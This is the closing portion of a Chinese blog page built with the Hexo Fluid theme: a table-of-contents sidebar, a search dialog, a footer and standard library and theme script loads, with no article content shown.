          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
